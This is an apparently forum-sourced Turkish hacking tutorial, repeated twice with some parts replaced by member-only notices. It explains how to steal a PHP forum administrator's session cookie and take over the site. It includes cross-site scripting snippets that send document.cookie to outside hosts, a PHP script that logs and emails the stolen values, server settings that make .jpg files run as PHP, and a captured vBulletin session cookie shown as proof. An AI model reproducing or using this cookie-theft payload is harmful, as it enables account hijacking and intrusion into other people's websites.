Oncelikle sıze bazı tanımlar yaparak ıse baslamak ıstıyorum.Bu yontemde sıze herhangı bır php forumda(phpbb , vbulletin vs...)nasıl admın gırısı yapacagınızı anlatacagım.Yontem gayet sıkı ve cogu sıtede ıse yaramaktadır.Sizden ricam bu yontemi ogrenırken sabırlı ve azımli davranmanızdır.
Simdi isimize bakalım bu yontem de esas olan sıteye admının cookie siyle girmektir.
Cookie:Ornegın sız santaj.org/sst ye(yani forumumuza) girdiniz.Eger siz gırerken benı hatırlayı ısaretlersenız bilgisayariniza sitenin bılgılerı gırılır ve siteyi actiginizda actıgınız oturumla devam edebilirsiniz.Kısacası cookiler web sayfanızı ziyaret eden ziyaretçilere sonraki girişlerinde tanımak için bırakılan metin dosyalarıdır.
1-> Peki bize cookieler ne gıbı bır faydası olacak?
Eger adminin cookiesini calabilirsek onun kıyle sıteye gırer ve siteyi hackleyebiliriz.
2->Peki yontemi nasıl uygulayacagız?
Genellikle php forumlarda gıbı resım koyma tagı vardır.Sımdı bız bunu ımg taqı ıcınde
bu resmi çağırırsanız o konuya giren herkesin cookie bilgisi
adresinde loglanıcaktır.
Aslında olay bu kadar basıt bunun daha gelismisleride var dir ama sımdılık cok fazla sıtee ub acık mevcut oldugu ıcın onlara degınmıyorum.
3->Peki CeMeTeRY abı sen ıyı guzel anlatmıssın da antichat bu ısı nasıl yapıor yanı resme code fln mı eklıor?Cok mu zor?
Bunun cevabı ıse gayet basıttır arkdaslar ve o kadar kolaydır kı sız bıle aa dersenız yanı.Eger daha onceden IIS veya Apache deneyımı olanalr ıcın bu uygulamayı yapmak cok kolay olabılır ama ben genede genıs bır anlatım yapayım bunada.Ben serverınıze IIS veya Apache kurdugunuzu varsaYasak Kelime ıslemlere baslıyorum.
Apache kuranlar icin;
Apache kurduğunuz klasore girip ordan conf klasorune httpd isimli dosyayı açıp AddType application/x-httpd-php3 .phtml .php3 .php satırını buluyorsunuz ve sonuna .jpg ekleyıniz.Burada php yi temsil edecek uzantıları seçiyorsunuz ve .jpg uzantısınıda php emrine vermiş oluyorsunuz
ISS ıcın ;
Başlat/çalıştır/regedit e girerek HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/W3SVC/Parameters/ScriptMap bölümüne girip düzen menüsünden yeni dize değerine tıklayın daha sonra yeni değer e çift tıklayıp .jpg yazınız.Bu ıslemele IIS de .jpg ye uzantıya php emrini vermis oldunuz.
Daha sonra yenı bır metin belgesi aciniz
******************.********=’http://www.site.com/log.php?’+escape(********.cookie)</script> yazarak atıyoruz cemetery.jpg olarak farklı kaydetmek ondan sonra bu dosyayı jpg uzantısını php nin emrine verdiğiniz server daki bir siteye atıp admin cookie çalmak istediğiniz siteye bu bbcode arasında çağırmaktır.
Kod:
<?php
$kayit = fopen("ekledik.txt","a");
foreach($_GET as $variable => $value) {
**********
img = new Image(); img.src =
"http://www.g3n3t1x.org/sniff/s.gif?"+********.cookie;
</script>
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail(" [email protected],Şifre Geldi uleeee ",":
[email protected]’);
?>
Arkadaslar bu yontemi gelistirmek birazcık ta size kalmıs bır sey eger bu yontemi iyice kavramak istiyorsaniz IIS veya Apache mutlaka kurun derim.Ayrıca yontemin basarıya ulasacagından emin degliseniz size ufak bir gosteri yapayım.
REFERER=http://www.hackhell.com/showthread.php?p=303948#post303948
QUERY=bblastvisit=1137790507; bblastactivity=1137791589; bbsessionhash=d6fae56f834c8b449849dad4cefb925b; bbforum_view=7d004c74ab20a1c3264b2df1931e164dax1x-ix15yix1137791711y_; bbthread_lastview=382c99e187c8c7b46e7c4a4734b8ad7aax1x-ix42142ysx10x"1137791744"y_
Simdi isimize bakalım bu yontem de esas olan sıteye admının cookie siyle girmektir.
Cookie:Ornegın sız santaj.org/sst ye(yani forumumuza) girdiniz.Eger siz gırerken benı hatırlayı ısaretlersenız bilgisayariniza sitenin bılgılerı gırılır ve siteyi actiginizda actıgınız oturumla devam edebilirsiniz.Kısacası cookiler web sayfanızı ziyaret eden ziyaretçilere sonraki girişlerinde tanımak için bırakılan metin dosyalarıdır.
1-> Peki bize cookieler ne gıbı bır faydası olacak?
Eger adminin cookiesini calabilirsek onun kıyle sıteye gırer ve siteyi hackleyebiliriz.
2->Peki yontemi nasıl uygulayacagız?
Genellikle php forumlarda gıbı resım koyma tagı vardır.Sımdı bız bunu ımg taqı ıcınde
İçeriği görüntülemek için üye olmalısınız.
İçeriği görüntülemek için üye olmalısınız.
Aslında olay bu kadar basıt bunun daha gelismisleride var dir ama sımdılık cok fazla sıtee ub acık mevcut oldugu ıcın onlara degınmıyorum.
3->Peki CeMeTeRY abı sen ıyı guzel anlatmıssın da antichat bu ısı nasıl yapıor yanı resme code fln mı eklıor?Cok mu zor?
Bunun cevabı ıse gayet basıttır arkdaslar ve o kadar kolaydır kı sız bıle aa dersenız yanı.Eger daha onceden IIS veya Apache deneyımı olanalr ıcın bu uygulamayı yapmak cok kolay olabılır ama ben genede genıs bır anlatım yapayım bunada.Ben serverınıze IIS veya Apache kurdugunuzu varsaYasak Kelime ıslemlere baslıyorum.
Apache kuranlar icin;
Apache kurduğunuz klasore girip ordan conf klasorune httpd isimli dosyayı açıp AddType application/x-httpd-php3 .phtml .php3 .php satırını buluyorsunuz ve sonuna .jpg ekleyıniz.Burada php yi temsil edecek uzantıları seçiyorsunuz ve .jpg uzantısınıda php emrine vermiş oluyorsunuz
ISS ıcın ;
Başlat/çalıştır/regedit e girerek HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/W3SVC/Parameters/ScriptMap bölümüne girip düzen menüsünden yeni dize değerine tıklayın daha sonra yeni değer e çift tıklayıp .jpg yazınız.Bu ıslemele IIS de .jpg ye uzantıya php emrini vermis oldunuz.
Daha sonra yenı bır metin belgesi aciniz
******************.********=’http://www.site.com/log.php?’+escape(********.cookie)</script> yazarak atıyoruz cemetery.jpg olarak farklı kaydetmek ondan sonra bu dosyayı jpg uzantısını php nin emrine verdiğiniz server daki bir siteye atıp admin cookie çalmak istediğiniz siteye bu bbcode arasında çağırmaktır.
Kod:
<?php
$kayit = fopen("ekledik.txt","a");
foreach($_GET as $variable => $value) {
**********
img = new Image(); img.src =
"http://www.g3n3t1x.org/sniff/s.gif?"+********.cookie;
</script>
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail(" [email protected],Şifre Geldi uleeee ",":
[email protected]’);
?>
Arkadaslar bu yontemi gelistirmek birazcık ta size kalmıs bır sey eger bu yontemi iyice kavramak istiyorsaniz IIS veya Apache mutlaka kurun derim.Ayrıca yontemin basarıya ulasacagından emin degliseniz size ufak bir gosteri yapayım.
REFERER=http://www.hackhell.com/showthread.php?p=303948#post303948
QUERY=bblastvisit=1137790507; bblastactivity=1137791589; bbsessionhash=d6fae56f834c8b449849dad4cefb925b; bbforum_view=7d004c74ab20a1c3264b2df1931e164dax1x-ix15yix1137791711y_; bbthread_lastview=382c99e187c8c7b46e7c4a4734b8ad7aax1x-ix42142ysx10x"1137791744"y_